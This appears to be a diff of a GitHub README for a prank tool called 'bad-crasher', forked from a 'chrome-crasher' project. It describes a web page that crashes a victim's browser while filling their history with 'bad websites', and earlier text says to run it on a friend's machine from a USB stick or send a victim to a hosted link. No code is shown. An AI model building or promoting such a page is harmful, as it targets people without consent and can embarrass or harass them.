dot-jms/bad-crasher/README.md

-# chrome-crasher
+# bad-crasher - credit to thatboyo
-crashes your browser
+crashes your browser but with bad websites so ur history is bad

-download the index.html on a usb, then use the usb on a friend, double click index.html in files or get your victim to go to thatboyo.github.io/chrome-crasher
+used in discratch